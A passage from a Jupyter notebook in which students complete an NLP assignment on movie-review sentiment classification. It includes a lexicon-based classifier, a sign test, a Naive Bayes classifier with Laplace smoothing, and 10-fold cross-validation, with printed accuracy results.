sents\n print_sentence_with_pos(r[\"content\"][0])\n if i == 4: \n break\n \nc = Counter()\nfor review in reviews:\n for sentence in review[\"content\"]:\n for token, pos_tag in sentence:\n c[token.lower()] += 1\n\nprint(\"#types\", len(c))\n\nprint(\"Most common tokens:\")\nfor token, count in c.most_common(25):\n print(\"%10s : %8d\" % (token, count))\n ", "2000\n0 NEG 29\nTwo/CD teen/JJ couples/NNS go/VBP to/TO a/DT church/NN party/NN ,/, drink/NN and/CC then/RB drive/NN ./.\n1 NEG 11\nDamn/JJ that/IN Y2K/CD bug/NN ./.\n2 NEG 24\nIt/PRP is/VBZ movies/NNS like/IN these/DT that/WDT make/VBP a/DT jaded/JJ movie/NN viewer/NN thankful/JJ for/IN the/DT invention/NN of/IN the/DT Timex/NNP IndiGlo/NNP watch/NN ./.\n3 NEG 19\nQUEST/NN FOR/IN CAMELOT/NNP ``/`` Quest/NNP for/IN Camelot/NNP ''/'' is/VBZ Warner/NNP Bros./NNP '/POS first/JJ feature-length/JJ ,/, fully-animated/JJ attempt/NN to/TO steal/VB clout/NN from/IN Disney/NNP 's/POS cartoon/NN empire/NN ,/, but/CC the/DT mouse/NN has/VBZ no/DT reason/NN to/TO be/VB worried/VBN ./.\n4 NEG 38\nSynopsis/NNPS :/: A/DT mentally/RB unstable/JJ man/NN undergoing/VBG psychotherapy/NN saves/VBZ a/DT boy/NN from/IN a/DT potentially/RB fatal/JJ accident/NN and/CC then/RB falls/VBZ in/IN love/NN with/IN the/DT boy/NN 's/POS mother/NN ,/, a/DT fledgling/NN restauranteur/NN ./.\n#types 47743\nMost common tokens:\n , : 77842\n the : 75948\n . : 59027\n a : 37583\n and : 35235\n of : 33864\n to : 31601\n is : 25972\n in : 21563\n 's : 18043\n it : 15904\n that : 15820\n -rrb- : 11768\n -lrb- : 11670\n as : 11312\n with : 10739\n for : 9816\n his : 9542\n this : 9497\n film : 9404\n '' : 9282\n he : 8804\n `` : 8801\n i : 8619\n but : 8537\n" ] ], [ [ "Symbolic approach – sentiment lexicon (2pts)\n---------------------------------------------------------------------\n\n", "_____no_output_____" ], [ "**How** could one automatically classify movie reviews according to their\nsentiment? \n\nIf we had access to a **sentiment lexicon**, then there are ways to solve\nthe problem without using Machine Learning. One might simply look up\nevery open-class word in the lexicon, and compute a binary score\n$S_{binary}$ by counting how many words match either a positive, or a\nnegative word entry in the sentiment lexicon $SLex$.\n\n$$S_{binary}(w_1w_2...w_n) = \\sum_{i = 1}^{n}\\text{sgn}(SLex\\big[w_i\\big])$$\n\n**Threshold.** In average there are more positive than negative words per review (~7.13 more positive than negative per review) to take this bias into account you should use a threshold of **8** (roughly the bias itself) to make it harder to classify as positive.\n\n$$\n\\text{classify}(S_{binary}(w_1w_2...w_n)) = \\bigg\\{\\begin{array}{ll}\n \\text{positive} & \\text{if } S_{binary}(w_1w_2...w_n) > threshold\\\\\n \\text{negative} & \\text{else }\n \\end{array}\n$$\n\nTo implement this approach, you should use the sentiment\nlexicon in `sent_lexicon`, which was taken from the\nfollowing work:\n\n> Theresa Wilson, Janyce Wiebe, and Paul Hoffmann\n(2005). [Recognizing Contextual Polarity in Phrase-Level Sentiment\nAnalysis](http://www.aclweb.org/anthology/H/H05/H05-1044.pdf). HLT-EMNLP.", "_____no_output_____" ], [ "\n#### (Q: 1.1) Implement this approach and report its classification accuracy. (1 pt)", "_____no_output_____" ], [ "##### This block loads the lexicon file and stores the sentiments and word types as dictionaries", "_____no_output_____" ] ], [ [ "#\n# Given a line from the sentiment file \n# ex. type=weaksubj len=1 word1=abandoned pos1=adj stemmed1=n priorpolarity=negative\n# Returns a dictionary \n# ex. {type: weaksubj, len: 1, word1: abandoned, pos1: adj, stemmed1: n, priorpolarity: negative}\n#\ndef sentiment_line_to_dict(line):\n dictionary = {}\n \n words = line.split()\n for word in words:\n variable_assignment = word.split('=')\n variable = variable_assignment[0]\n value = variable_assignment[1]\n \n dictionary[variable] = value\n \n return dictionary\n\n#\n# Adds the word with the sentiment to the dictionary.\n# If the word is already in the dictionary and the sentiments are conflicting, \n# the sentiment will be set to 0 (neutral).\n#\ndef add_sentiment_to_dict(sentiment_dict, word, sentiment):\n if word in sentiment_dict.keys():\n if not sentiment_dict[word] == sentiment:\n sentiment_dict[word] = 0\n else:\n sentiment_dict[word] = sentiment\n \n return sentiment_dict\n\n#\n# Adds the word with the type to the dictionary.\n# If the word is already in the dictionary and the types are conflicting, \n# the type will be set to 2 (neutral).\n#\ndef add_type_to_dict(type_dict, word, word_type):\n if word in type_dict.keys():\n if not type_dict[word] == word_type:\n type_dict[word] = 2\n else:\n type_dict[word] = word_type\n \n return type_dict\n\n\n#\n# Converts a sentiment string: \"positive\", \"negative\", \"neutral\" to 1, -1 and 0 respectively.\n#\ndef sentiment_to_score(sentiment_as_string):\n if sentiment_as_string == 'positive':\n return 1\n if sentiment_as_string == 'negative':\n return -1\n return 0\n\n\n#\n# Converts a type string: \"strongsubj\", \"weaksubj\" to 2, and 1 respectively.\n#\ndef type_to_score(type_as_string):\n if type_as_string == 'strongsubj':\n return 3\n if type_as_string == 'weaksubj':\n return 1\n \n return 1\n \n \n#\n# Parses the lexicon file and return 2 dictionaries:\n# sentiment_dict with structure: { \"love\": 1, \"hate\": -1, \"butter\": 0 ... }\n# 1 is positive, -1 is negative, 0 is neutral.\n#\n# type_dict with structure: { \"love\": 2, \"hate\": 1, \"butter\": 1.5 ... } \n# 2 is a strong type, 1 is a weak type and 1.5 is a word that had both types in the file.\n#\ndef parse_lexicon_to_dicts():\n with open(\"sent_lexicon\", mode=\"r\", encoding=\"utf-8\") as file:\n array_of_lines = file.readlines()\n \n sentiment_dict = {}\n type_dict = {}\n \n for line in array_of_lines:\n line_as_dict = sentiment_line_to_dict(line)\n \n word = line_as_dict['word1']\n word_type = type_to_score(line_as_dict['type'])\n sentiment = sentiment_to_score(line_as_dict['priorpolarity'])\n \n sentiment_dict = add_sentiment_to_dict(sentiment_dict, word, sentiment)\n type_dict = add_type_to_dict(type_dict, word, word_type)\n \n return sentiment_dict, type_dict\n\n\nsentiment_dict, type_dict = parse_lexicon_to_dicts() \nprint(\"Loaded the file!\")\n", "Loaded the file!\n" ] ], [ [ "##### This block contains the binary classification code", "_____no_output_____" ] ], [ [ "THRESHOLD = 8\n\n\n#\n# Given a review returns a list of all the words.\n# note: all words are converted to lowercase\n#\ndef get_words_of_review(review):\n content = review['content']\n \n words = []\n for line in content:\n for word_pair in line:\n word = word_pair[0]\n word_in_lowercase = word.lower()\n words.append(word_in_lowercase)\n \n return words\n\n\n#\n# Returns the binary (unaltered) score of the word;\n# 1 for positive, -1 for negative, 0 for neutral or not found.\n#\ndef get_binary_score_of_word(word):\n try:\n return sentiment_dict[word]\n except KeyError:\n # Word not in our dictionary.\n return 0\n\n\n#\n# Given a review returns the real sentiment.\n# -1 for negative, 1 for positive.\n#\ndef get_real_sentiment_of_review(review):\n if (review['sentiment'] == 'NEG'):\n return -1\n \n return 1\n \n \n#\n# Given a review returns 1 if it classifies it as positive, and -1 otherwise.\n#\ndef binary_classify_review(review):\n words = get_words_of_review(review)\n \n score = 0\n for word in words:\n score += get_binary_score_of_word(word)\n \n if score > THRESHOLD:\n return 1\n \n return -1\n \n\n#\n# Returns token_results which is a list of wheter our predictions were correct: ['-', '+', '-', ...]\n# And returns the accuracy as a percentage, e.g. 45 for 45% accuracy.\n#\ndef binary_classify_all_reviews():\n total = 0\n correct = 0\n token_results = []\n \n for review in reviews:\n prediction = binary_classify_review(review)\n real_sentiment = get_real_sentiment_of_review(review)\n \n if prediction == real_sentiment:\n correct += 1\n token_results.append('+')\n else:\n token_results.append('-')\n \n total += 1\n \n accuracy = correct / total * 100\n return accuracy, token_results\n\n", "_____no_output_____" ], [ "binary_accuracy, binary_results = binary_classify_all_reviews()\nprint(\"Binary classification accuracy: {0:.2f}%\".format(binary_accuracy))", "Binary classification accuracy: 68.45%\n" ] ], [ [ "If the sentiment lexicon also has information about the **magnitude** of\nsentiment (e.g., *“excellent\"* would have higher magnitude than\n*“good\"*), we could take a more fine-grained approach by adding up all\nsentiment scores, and deciding the polarity of the movie review using\nthe sign of the weighted score $S_{weighted}$.\n\n$$S_{weighted}(w_1w_2...w_n) = \\sum_{i = 1}^{n}SLex\\big[w_i\\big]$$\n\n\nTheir lexicon also records two possible magnitudes of sentiment (*weak*\nand *strong*), so you can implement both the binary and the weighted\nsolutions (please use a switch in your program). For the weighted\nsolution, you can choose the weights intuitively *once* before running\nthe experiment.\n\n#### (Q: 1.2) Now incorporate magnitude information and report the classification accuracy. Don't forget to use the threshold. (1 pt)", "_____no_output_____" ] ], [ [ "#\n# Returns the weighted score of the word;\n# it multiplies the original score of the word with the type (strong 3, neutral 2, or weak 1).\n#\ndef get_weighted_score_of_word(word):\n try:\n score = sentiment_dict[word]\n word_type = type_dict[word]\n return word_type * score\n \n except KeyError:\n # Word not in our dictionary.\n return 0\n\n \n#\n# Given a review returns 1 if it classifies it as positive, and -1 otherwise.\n#\ndef weighted_classify_review(review):\n words = get_words_of_review(review)\n \n score = 0\n for word in words:\n score += get_weighted_score_of_word(word)\n \n if score > THRESHOLD:\n return 1\n \n return -1\n\n\n#\n# Returns token_results which is a list of wheter our predictions were correct: ['-', '+', '-', ...]\n# And returns the accuracy as a percentage, e.g. 45 for 45% accuracy.\n#\ndef weighted_classify_all_reviews():\n total = 0\n correct = 0\n token_results = []\n \n for review in reviews:\n prediction = weighted_classify_review(review)\n real_sentiment = get_real_sentiment_of_review(review)\n \n if prediction == real_sentiment:\n correct += 1\n token_results.append('+')\n else:\n token_results.append('-')\n \n total += 1\n \n accuracy = correct / total * 100\n return accuracy, token_results\n\n", "_____no_output_____" ], [ "magnitude_accuracy, magnitude_results = weighted_classify_all_reviews()\nprint(\"Magnitude classification accuracy: {0:.2f}%\".format(magnitude_accuracy))", "Magnitude classification accuracy: 68.80%\n" ] ], [ [ "#### Optional: make a barplot of the two results.", "_____no_output_____" ] ], [ [ "\nplt.bar(\"Binary\", binary_accuracy)\nplt.bar(\"Magnitude\", magnitude_accuracy)\nplt.ylabel(\"Accuracy in %\")\nplt.title(\"Accuracy of binary and magnitude classification\")\n\nplt.show()\n", "_____no_output_____" ] ], [ [ "Answering questions in statistically significant ways (1pt)\n-------------------------------------------------------------", "_____no_output_____" ], [ "Does using the magnitude improve the results? Oftentimes, answering questions like this about the performance of\ndifferent signals and/or algorithms by simply looking at the output\nnumbers is not enough. When dealing with natural language or human\nratings, it’s safe to assume that there are infinitely many possible\ninstances that could be used for training and testing, of which the ones\nwe actually train and test on are a tiny sample. Thus, it is possible\nthat observed differences in the reported performance are really just\nnoise. \n\nThere exist statistical methods which can be used to check for\nconsistency (*statistical significance*) in the results, and one of the\nsimplest such tests is the **sign test**. \n\nThe sign test is based on the binomial distribution. Count all cases when System 1 is better than System 2, when System 2 is better than System 1, and when they are the same. Call these numbers $Plus$, $Minus$ and $Null$ respectively. \n\nThe sign test returns the probability that the null hypothesis is true. \n\nThis probability is called the $p$-value and it can be calculated for the two-sided sign test using the following formula (we multiply by two because this is a two-sided sign test and tests for the significance of differences in either direction):\n\n$$2 \\, \\sum\\limits_{i=0}^{k} \\binom{N}{i} \\, q^i \\, (1-q)^{N-i}$$\n\nwhere $$N = 2 \\Big\\lceil \\frac{Null}{2}\\Big\\rceil + Plus + Minus$$ is the total\nnumber of cases, and\n$$k = \\Big\\lceil \\frac{Null}{2}\\Big\\rceil + \\min\\{Plus,Minus\\}$$ is the number of\ncases with the less common sign. \n\nIn this experiment, $q = 0.5$. Here, we\ntreat ties by adding half a point to either side, rounding up to the\nnearest integer if necessary. \n\n\n#### (Q 2.1): Implement the sign test. Is the difference between the two symbolic systems significant? What is the p-value? (1 pt)\n\nYou should use the `comb` function from `scipy` and the `decimal` package for the stable adding of numbers in the final summation.\n\nYou can quickly verify the correctness of\nyour sign test code using a [free online\ntool](https://www.graphpad.com/quickcalcs/binomial1.cfm).", "_____no_output_____" ] ], [ [ "from decimal import Decimal\nfrom scipy.misc import comb\n\n\ndef sign_test(results_1, results_2):\n \"\"\"test for significance\n results_1 is a list of classification results (+ for correct, - incorrect)\n results_2 is a list of classification results (+ for correct, - incorrect)\n \"\"\"\n ties, plus, minus = 0, 0, 0\n\n # \"-\" carries the error\n for i in range(0, len(results_1)):\n if results_1[i]==results_2[i]:\n ties += 1\n elif results_1[i]==\"-\": \n plus += 1\n elif results_2[i]==\"-\": \n minus += 1\n\n n = Decimal(2 * math.ceil(ties / 2.) + plus + minus)\n \n k = Decimal(math.ceil(ties / 2.) + min(plus, minus))\n\n summation = Decimal(0.0)\n for i in range(0,int(k)+1):\n summation += Decimal(comb(n, i, exact=True))\n\n # use two-tailed version of test\n summation *= 2\n summation *= (Decimal(0.5)**Decimal(n))\n\n print(\"the difference is\", \n \"not significant\" if summation >= 0.05 else \"significant\")\n\n return summation\n\np_value = sign_test(binary_results, magnitude_results)\nprint(\"p_value =\", p_value)", "/usr/local/Cellar/ipython/7.1.1/libexec/vendor/lib/python3.7/site-packages/ipykernel_launcher.py:27: DeprecationWarning: `comb` is deprecated!\nImporting `comb` from scipy.misc is deprecated in scipy 1.0.0. Use `scipy.special.comb` instead.\n" ] ], [ [ "## Using the Sign test\n\n**From now on, report all differences between systems using the\nsign test.** You can think about a change that you apply to one system, as a\n new system.\n \nYou should report statistical test\nresults in an appropriate form – if there are several different methods\n(i.e., systems) to compare, tests can only be applied to pairs of them\nat a time. This creates a triangular matrix of test results in the\ngeneral case. When reporting these pair-wise differences, you should\nsummarise trends to avoid redundancy.\n", "_____no_output_____" ], [ "Naive Bayes (8pt + 1pt bonus)\n==========", "_____no_output_____" ], [ "\nYour second task is to program a simple Machine Learning approach that operates\non a simple Bag-of-Words (BoW) representation of the text data, as\ndescribed in Pang et al. (2002). In this approach, the only features we\nwill consider are the words in the text themselves, without bringing in\nexternal sources of information. The BoW model is a popular way of\nrepresenting text information as vectors (or points in space), making it\neasy to apply classical Machine Learning algorithms on NLP tasks.\nHowever, the BoW representation is also very crude, since it discards\nall information related to word order and grammatical structure in the\noriginal text.\n\n## Writing your own classifier\n\nWrite your own code to implement the Naive Bayes (NB) classifier. As\na reminder, the Naive Bayes classifier works according to the following\nequation:\n$$\\hat{c} = \\operatorname*{arg\\,max}_{c \\in C} P(c|\\bar{f}) = \\operatorname*{arg\\,max}_{c \\in C} P(c)\\prod^n_{i=1} P(f_i|c)$$\nwhere $C = \\{ \\text{POS}, \\text{NEG} \\}$ is the set of possible classes,\n$\\hat{c} \\in C$ is the most probable class, and $\\bar{f}$ is the feature\nvector. Remember that we use the log of these probabilities when making\na prediction:\n$$\\hat{c} = \\operatorname*{arg\\,max}_{c \\in C} \\Big\\{\\log P(c) + \\sum^n_{i=1} \\log P(f_i|c)\\Big\\}$$\n\nYou can find more details about Naive Bayes in [Jurafsky &\nMartin](https://web.stanford.edu/~jurafsky/slp3/). You can also look at\nthis helpful\n[pseudo-code](https://nlp.stanford.edu/IR-book/html/htmledition/naive-bayes-text-classification-1.html).\n\n*Note: this section and the next aim to put you a position to replicate\n Pang et al., Naive Bayes results. However, the numerical results\n will differ from theirs, as they used different data.*\n\n**You must write the Naive Bayes training and prediction code from\nscratch.** You will not be given credit for using off-the-shelf Machine\nLearning libraries.\n\nThe data contains the text of the reviews, where each document consists\nof the sentences in the review, the sentiment of the review and an index\n(cv) that you will later use for cross-validation. You will find the\ntext has already been tokenised and POS-tagged for you. Your algorithm\nshould read in the text, **lowercase it**, and store the words and their\nfrequencies in an appropriate data structure that allows for easy\ncomputation of the probabilities used in the Naive Bayes algorithm, and\nthen make predictions for new instances.", "_____no_output_____" ], [ "#### (Q3.1) Train your classifier on (positive and negative) reviews with cv-value 000-899, and test it on the remaining reviews cv900–cv999. Report results using simple classification accuracy as your evaluation metric. Your features are the word vocabulary. The value of a feature is the count of that feature (word) in the document. (2pts)\n", "_____no_output_____" ], [ "The following code block contains our BagOfWords class", "_____no_output_____" ] ], [ [ "#\n# This class represents our bag of words. It stores the words in a dictionary in the following format:\n# BOW = {\n# 'cat': {\n# 'POS': 3, # 3 positive occurences\n# 'NEG': 1, # 1 negative occurences\n# 'P_POS': 0.001 # probability of this word occuring in positive review\n# 'P_NEG': 0.00033 # probability of this word occuring in negative review\n# }, \n# 'dog': {\n# etc..\n# }\n#\nclass BagOfWords:\n \n def __init__(self, positive_prior):\n self.positive_prior = positive_prior\n self.total_positive_words = 0\n self.total_negative_words = 0\n self.bag_of_words = {}\n \n #\n # Adds a words to the BOW, if it is already in the BOW it will increment the occurence of the word.\n #\n def add_word(self, word, sentiment):\n # Keep a count of total number of positive and negative words.\n if sentiment == 'POS':\n self.count_positive_word()\n else:\n self.count_negative_word()\n \n # If the word is not yet in our bag of words:\n # Initialize the word with 0 POS and 0 NEG occurences.\n if not word in self.bag_of_words.keys():\n self.bag_of_words[word] = {}\n self.bag_of_words[word]['POS'] = 0\n self.bag_of_words[word]['NEG'] = 0\n \n self.bag_of_words[word][sentiment] += 1\n \n \n #\n # Adds the P_POS and P_NEG to the BOW.\n #\n def add_probabilities(self, word, p_pos, p_neg):\n if not word in self.bag_of_words.keys():\n self.bag_of_words[word] = {}\n self.bag_of_words[word]['POS'] = 0\n self.bag_of_words[word]['NEG'] = 0\n \n self.bag_of_words[word]['P_POS'] = p_pos\n self.bag_of_words[word]['P_NEG'] = p_neg\n \n #\n # Increments the number of positive words it found by 1\n #\n def count_positive_word(self):\n self.total_positive_words += 1\n \n #\n # Increments the number of negative words it found by 1\n #\n def count_negative_word(self):\n self.total_negative_words += 1\n \n #\n # Returns the number of unique words in the BOW.\n #\n def get_n_unique_words(self):\n return len(self.bag_of_words)\n \n #\n # Returns the words in the bag of words.\n #\n def get_words(self):\n return self.bag_of_words\n \n #\n # Returns the number of occurences of the word with the given sentiment (POS or NEG)\n #\n def count_occurences(self, word, sentiment):\n try:\n return self.bag_of_words[word][sentiment]\n except KeyError:\n return 0\n \n #\n # Returns the computed P_POS or P_NEG for the given word, if it is a new word 0 is returned.\n #\n def get_probability(self, word, sentiment):\n sentiment = \"P_{}\".format(sentiment)\n \n try:\n return self.bag_of_words[word][sentiment]\n except KeyError:\n return 0\n", "_____no_output_____" ] ], [ [ "The following code block contains our BayesClassifier class.", "_____no_output_____" ] ], [ [ "\nclass BayesClassifier:\n \n #\n # use_smoothing: If True uses laplace smoothing with constant k=1\n # use_stemming: If True uses stemming.\n # n_grams: The number of features to use, e.g. if 2: both 1-grams and 2-grams are used as features.\n # if 3: both 1-grams, 2-grams and 3-grams are used as features.\n #\n def __init__(self, use_smoothing=False, use_stemming=False, n_grams=1):\n self.use_smoothing = use_smoothing\n self.use_stemming = use_stemming\n self.n_grams = n_grams\n self.stemmer = PorterStemmer()\n \n #\n # Given a list of train indices and a list of test indices trains the classifier\n # and returns the accuracy (number) and the results (list of + and -).\n # For question 3.2 we want to be able to indicate if we want only the POS, NEG or BOTH of a CV index.\n # This is the list train_indices_sentiment and test_indices_sentiment.\n # train_and_classify([1, 2, 3], [4], [\"BOTH\", \"POS\", \"POS\"], [\"NEG\"])\n # will train on [1-NEG, 1-POS, 2-POS, 3-POS] and test on [4-NEG]\n #\n def train_and_classify(self, train_indices, test_indices, train_indices_sentiment=[], test_indices_sentiment=[]):\n bag_of_words = self.train(train_indices, train_indices_sentiment)\n \n total = 0\n correct = 0\n results = []\n \n for review in self.get_relevant_reviews(test_indices, test_indices_sentiment):\n prediction = self.classify(bag_of_words, review)\n true_label = review['sentiment']\n \n if prediction == true_label:\n correct += 1\n results.append('+')\n else:\n results.append('-')\n \n total += 1\n \n accuracy = correct / total * 100\n return accuracy, results\n \n #\n # Classifies a single review, returns POS or NEG.\n #\n def classify(self, bag_of_words, review):\n score_positive = math.log(bag_of_words.positive_prior)\n score_negative = math.log(1 - bag_of_words.positive_prior)\n \n for word in self.get_words_of_review(review):\n \n p_pos = bag_of_words.get_probability(word, 'POS')\n p_neg = bag_of_words.get_probability(word, 'NEG')\n \n if p_pos > 0:\n score_positive += math.log(p_pos)\n if p_neg > 0:\n score_negative += math.log(p_neg)\n \n # This word was not in the training set so the probability is 0!\n if self.use_smoothing and (p_pos == 0 or p_neg == 0):\n p_pos = 1 / (bag_of_words.total_positive_words + bag_of_words.get_n_unique_words())\n p_neg = 1 / (bag_of_words.total_negative_words + bag_of_words.get_n_unique_words())\n \n score_positive += math.log(p_pos)\n score_negative += math.log(p_neg)\n \n if (score_positive > score_negative):\n return \"POS\"\n else:\n return \"NEG\"\n\n \n #\n # Trains the classifier, creates a BOW with occurences and probabilities.\n #\n def train(self, indices, indices_sentiment):\n bag_of_words = self.create_bag_of_words(indices, indices_sentiment)\n \n for word in bag_of_words.get_words():\n positive_occurences = bag_of_words.count_occurences(word, \"POS\")\n negative_occurences = bag_of_words.count_occurences(word, \"NEG\")\n\n if self.use_smoothing:\n probability_pos = (positive_occurences + 1) / (bag_of_words.total_positive_words + bag_of_words.get_n_unique_words())\n probability_neg = (negative_occurences + 1) / (bag_of_words.total_negative_words + bag_of_words.get_n_unique_words())\n else:\n if bag_of_words.total_positive_words == 0:\n probability_pos = 0\n else:\n probability_pos = positive_occurences / bag_of_words.total_positive_words\n\n if bag_of_words.total_negative_words == 0:\n probability_neg = 0\n else:\n probability_neg = negative_occurences / bag_of_words.total_negative_words\n\n bag_of_words.add_probabilities(word, probability_pos, probability_neg)\n \n return bag_of_words\n \n #\n # Returns a bag of word object created from the given indices.\n #\n def create_bag_of_words(self, indices, indices_sentiment):\n bag_of_words = BagOfWords(self.get_positive_prior(indices, indices_sentiment))\n \n relevant_reviews = self.get_relevant_reviews(indices, indices_sentiment)\n\n for review in relevant_reviews:\n for word in self.get_words_of_review(review):\n bag_of_words.add_word(word, review['sentiment'])\n \n return bag_of_words\n \n #\n # Given the train indices, gets the positive prior. (positive reviews / total reviews)\n #\n def get_positive_prior(self, indices, indices_sentiment):\n n_positive = 0\n n_total = 0\n \n for review in reviews:\n if not review['cv'] in indices:\n continue\n \n if len(indices_sentiment) > 0:\n if indices_sentiment[indices.index(review['cv'])] != \"BOTH\":\n if indices_sentiment[indices.index(review['cv'])] != review['sentiment']:\n continue\n \n \n if review['sentiment'] == 'POS':\n n_positive += 1\n \n n_total += 1\n \n return n_positive / n_total\n \n #\n # Returns a list of the relevant reviews.\n # - Only reviews with the given indices\n # - If self.sentiment != \"BOTH\" only returns reviews of the same sentiment.\n #\n def get_relevant_reviews(self, indices, indices_sentiment):\n relevant_reviews = []\n \n for review in reviews:\n if not review['cv'] in indices:\n continue\n \n if len(indices_sentiment) > 0:\n if indices_sentiment[indices.index(review['cv'])] != \"BOTH\":\n if indices_sentiment[indices.index(review['cv'])] != review['sentiment']:\n continue\n \n relevant_reviews.append(review)\n \n return relevant_reviews\n \n \n def get_words_of_review(self, review):\n words = []\n for line in review['content']:\n for word_pair in line:\n word = word_pair[0].lower()\n \n if self.use_stemming:\n word = self.stemmer.stem(word)\n \n words.append(word)\n \n ngrams = []\n for i in range(0, self.n_grams):\n \n for j in range(0, len(words) - i):\n ngram_word = \"\"\n \n for k in range(0, i+1):\n ngram_word += \"{}\\\\\".format(words[j+k])\n ngrams.append(ngram_word)\n \n return ngrams\n", "_____no_output_____" ], [ "bayes = BayesClassifier(False, False, 1) \n\ntrain_indices = list(range(0,900))\ntest_indices = list(range(900, 1000))\n\nsimple_bayes_accuracy, simple_bayes_results = bayes.train_and_classify(train_indices, test_indices)\nprint(\"Simple (no smoothing) bayes accuracy {0:.2f}%\".format(simple_bayes_accuracy))", "Simple (no smoothing) bayes accuracy 49.50%\n" ] ], [ [ "#### (Bonus Questions) Would you consider accuracy to also be a good way to evaluate your classifier in a situation where 90% of your data instances are of positive movie reviews? (1pt)\n\nYou can simulate this scenario by keeping the positive reviews\ndata unchanged, but only using negative reviews cv000–cv089 for\ntraining, and cv900–cv909 for testing. Calculate the classification\naccuracy, and explain what changed.", "_____no_output_____" ] ], [ [ "# Question is very vague, but here is what we think the data should look like:\n# TRAIN\n# 0 - 899 : positive reviews\n# 0 - 89 : negative reviews\n#\n# TEST\n# 900 - 999 : positive reviews\n# 900 - 909 : negative reviews\n#\n\nbayes = BayesClassifier(False, False, 1)\n\ntrain_indices = list(range(0,900))\ntrain_sentiment = []\n\n# For review 0 - 89 say that we want BOTH the positive and negative reviews.\n# For review 90 - 899 say that we want only the POS reviews.\nfor i in range(0, len(train_indices)):\n if i < 90:\n train_sentiment.append(\"BOTH\")\n else:\n train_sentiment.append(\"POS\")\n \ntest_indices = list(range(900, 1000))\ntest_sentiment = []\n\n# For review 900 - 909 say that we want BOTH the positive and negative reviews.\n# For review 910 - 999 say that we want only the POS reviews.\nfor i in range(0, len(test_indices)):\n if i < 10:\n test_sentiment.append(\"BOTH\")\n else:\n test_sentiment.append(\"POS\")\n\nsimple_negative_bayes_accuracy, simple_negative_bayes_results = bayes.train_and_classify(train_indices, test_indices, train_sentiment, test_sentiment)\nprint(\"Simple (no smoothing) bayes accuracy trained on 90% positive reviews {0:.2f}%\".format(simple_negative_bayes_accuracy))", "Simple (no smoothing) bayes accuracy trained on 90% positive reviews 9.09%\n" ] ], [ [ "As you can see the classifier behaves badly now with only 9.09% accuracy. It predicts everything as a negative review. This is because it says very little negative reviews in the training data, and thus, each negative term in the training set will count 10 times more as each positive term in the training data. Meaning that a lot of negative words will have a high probability, explaining why everything gets predicted as negative.", "_____no_output_____" ], [ "## Smoothing\n\nThe presence of words in the test dataset that\nhaven’t been seen during training can cause probabilities in the Naive\nBayes classifier to be $0$, thus making that particular test instance\nundecidable. The standard way to mitigate this effect (as well as to\ngive more clout to rare words) is to use smoothing, in which the\nprobability fraction\n$$\\frac{\\text{count}(w_i, c)}{\\sum\\limits_{w\\in V} \\text{count}(w, c)}$$ for a word\n$w_i$ becomes\n$$\\frac{\\text{count}(w_i, c) + \\text{smoothing}(w_i)}{\\sum\\limits_{w\\in V} \\text{count}(w, c) + \\sum\\limits_{w \\in V} \\text{smoothing}(w)}$$\n\n\n\n", "_____no_output_____" ], [ "#### (Q3.2) Implement Laplace feature smoothing (1pt)\n($smoothing(\\cdot) = \\kappa$, constant for all words) in your Naive\nBayes classifier’s code, and report the impact on performance. \nUse $\\kappa = 1$.", "_____no_output_____" ] ], [ [ "bayes = BayesClassifier(True, False, 1) \n\ntrain_indices = list(range(0,900))\ntest_indices = list(range(900, 1000))\n\nsmoothing_bayes_accuracy, smoothing_bayes_results = bayes.train_and_classify(train_indices, test_indices)\nprint(\"Smoothed bayes accuracy {0:.2f}%\".format(smoothing_bayes_accuracy))", "Smoothed bayes accuracy 82.50%\n" ] ], [ [ "#### (Q3.3) Is the difference between non smoothed (Q3.1) and smoothed (Q3.2) statistically significant? (0.5pt)", "_____no_output_____" ] ], [ [ "p_value = sign_test(simple_bayes_results, smoothing_bayes_results)\nprint(\"p_value =\", p_value)", "the difference is significant\np_value = 0.000003547178174130642586494974890\n" ] ], [ [ "## Cross-validation\n\nA serious danger in using Machine Learning on small datasets, with many\niterations of slightly different versions of the algorithms, is that we\nend up with Type III errors, also called the “testing hypotheses\nsuggested by the data” errors. This type of error occurs when we make\nrepeated improvements to our classifiers by playing with features and\ntheir processing, but we don’t get a fresh, never-before seen test\ndataset every time. Thus, we risk developing a classifier that’s better\nand better on our data, but worse and worse at generalizing to new,\nnever-before seen data.\n\nA simple method to guard against Type III errors is to use\ncross-validation. In N-fold cross-validation, we divide the data into N\ndistinct chunks / folds. Then, we repeat the experiment N times, each\ntime holding out one of the chunks for testing, training our classifier\non the remaining N - 1 data chunks, and reporting performance on the\nheld-out chunk. We can use different strategies for dividing the data:\n\n- Consecutive splitting:\n - cv000–cv099 = Split 1\n - cv100–cv199 = Split 2\n - etc.\n \n- Round-robin splitting (mod 10):\n - cv000, cv010, cv020, … = Split 1\n - cv001, cv011, cv021, … = Split 2\n - etc.\n\n- Random sampling/splitting\n - Not used here (but you may choose to split this way in a non-educational situation)\n\n#### (Q3.4) Write the code to implement 10-fold cross-validation using round-robin splitting for your Naive Bayes classifier from Q3.2 and compute the 10 accuracies. Report the final performance, which is the average of the performances per fold. If all splits perform equally well, this is a good sign. (1pt)\n\n\n\n\n", "_____no_output_____" ] ], [ [ "#\n# Returns test_indices, and train_indices according to the round robin split algorithm.\n#\ndef round_robin_split_indices(n_split):\n test_indices = []\n train_indices = []\n \n for i in range(0, 1000):\n if i % 10 == n_split:\n test_indices.append(i)\n else:\n train_indices.append(i)\n \n return test_indices, train_indices\n\n#\n# Performs the kfold validation.\n#\ndef do_kfold(use_smoothing=False, use_stemming=False, n_grams=1): \n sum_accuracy = 0\n accuracies = []\n total_variance = 0\n \n all_results = []\n \n bayes = BayesClassifier(use_smoothing, use_stemming, n_grams)\n \n for i in range(0, 10):\n print(\"Progress {0:.0f}%\".format(i / 10 * 100))\n \n test_indices, train_indices = round_robin_split_indices(i)\n \n accuracy, result = bayes.train_and_classify(train_indices, test_indices)\n sum_accuracy += accuracy\n \n accuracies.append(accuracy)\n \n for r in result:\n all_results.append(r)\n\n avg_accuracy = sum_accuracy / 10\n \n for i in range(0, 10):\n sqred_error = (accuracies[i] - avg_accuracy)**2\n total_variance += sqred_error\n \n variance_accuracy = total_variance / 10 \n \n \n return avg_accuracy, variance_accuracy, all_results\n \n \n\nsmoothing_avg_accuracy, smoothing_variance, smoothing_results_kfold = do_kfold(True, False, 1)\nprint(\"10-fold validation average accuracy for 10 folds: {0:.2f}%\".format(smoothing_avg_accuracy))", "Progress 0%\nProgress 10%\nProgress 20%\nProgress 30%\nProgress 40%\nProgress 50%\nProgress 60%\nProgress 70%\nProgress 80%\nProgress 90%\n10-fold validation average accuracy for 10 folds: 